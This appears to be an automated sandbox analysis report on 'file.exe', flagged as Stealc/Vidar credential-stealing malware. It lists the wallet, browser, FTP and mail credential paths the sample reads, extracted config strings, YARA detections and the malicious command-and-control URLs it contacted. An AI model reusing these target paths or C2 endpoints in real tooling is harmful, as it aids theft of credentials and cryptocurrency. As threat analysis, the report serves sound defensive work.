Source: file.exe String found in binary or memory: tream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1
Source: file.exe String found in binary or memory: \Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiD
Source: file.exe String found in binary or memory: tream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1
Source: file.exe String found in binary or memory: \Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiD
Source: file.exe String found in binary or memory: ge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|
Source: file.exe String found in binary or memory: tream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1
Source: file.exe String found in binary or memory: tream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1
Source: file.exe String found in binary or memory: \Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiD
Source: file.exe String found in binary or memory: tream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1
Source: file.exe String found in binary or memory: \Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiD
Source: file.exe String found in binary or memory: ge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|
Source: file.exe String found in binary or memory: tream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1
Source: file.exe String found in binary or memory: tream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1
Source: file.exe, 00000001.00000002.2380756269.00000000007C6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance\.finger-print.fp
Source: file.exe String found in binary or memory: tream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1
Source: file.exe String found in binary or memory: ge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|
Source: file.exe String found in binary or memory: inance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger L
Source: file.exe String found in binary or memory: \Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiD
Source: file.exe String found in binary or memory: ge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|
Source: file.exe String found in binary or memory: \Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiD
Source: file.exe String found in binary or memory: tream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1
Source: file.exe String found in binary or memory: tream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1
Source: file.exe, 00000001.00000002.2380756269.00000000007C6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\*.*e
Tries to harvest and steal Bitcoin Wallet information
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-wal Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.js Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-shm Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-wal Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-shm Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Tries to harvest and steal ftp login credentials
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml Jump to behavior
Tries to steal Crypto Currency Wallets
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Binance\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\ Jump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004 Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: Process Memory Space: file.exe PID: 5948, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected Stealc
Source: Yara match File source: 1.2.file.exe.af0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000001.00000002.2380756269.0000000000768000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.2149042786.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.2380969091.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 5948, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected Vidar stealer
Source: Yara match File source: Process Memory Space: file.exe PID: 5948, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1538237 Sample: file.exe Startdate: 20/10/2024 Architecture: WINDOWS Score: 100 20 Suricata IDS alerts for network traffic 2->20 22 Found malware configuration 2->22 24 Antivirus detection for URL or domain 2->24 26 9 other signatures 2->26 5 file.exe 34 2->5         started        process3 dnsIp4 18 185.215.113.37, 49711, 80 WHOLESALECONNECTIONSNL Portugal 5->18 10 C:\Users\user\AppData\...\vcruntime140[1].dll, PE32 5->10 dropped 12 C:\Users\user\AppData\...\softokn3[1].dll, PE32 5->12 dropped 14 C:\Users\user\AppData\Local\...\nss3[1].dll, PE32 5->14 dropped 16 9 other files (none is malicious) 5->16 dropped 28 Detected unpacking (changes PE section rights) 5->28 30 Tries to detect sandboxes and other dynamic analysis tools (window names) 5->30 32 Tries to steal Mail credentials (via file / registry access) 5->32 34 12 other signatures 5->34 file5 signatures6
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
185.215.113.37
 unknown Portugal
206894 WHOLESALECONNECTIONSNL true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://185.215.113.37/ true
  • URL Reputation: malware
 unknown
http://185.215.113.37/0d60be0de163924d/nss3.dll true
  • URL Reputation: malware
 unknown
http://185.215.113.37/0d60be0de163924d/mozglue.dll true
  • URL Reputation: malware
 unknown
http://185.215.113.37/0d60be0de163924d/softokn3.dll true
  • URL Reputation: malware
 unknown
http://185.215.113.37/0d60be0de163924d/vcruntime140.dll true
  • URL Reputation: malware
 unknown
http://185.215.113.37/0d60be0de163924d/freebl3.dll true
  • URL Reputation: malware
 unknown
http://185.215.113.37/e2b1563c6670f193.php true
  • URL Reputation: malware
 unknown
http://185.215.113.37/0d60be0de163924d/sqlite3.dll true
  • URL Reputation: malware
 unknown
http://185.215.113.37/0d60be0de163924d/msvcp140.dll true
  • URL Reputation: malware
 unknown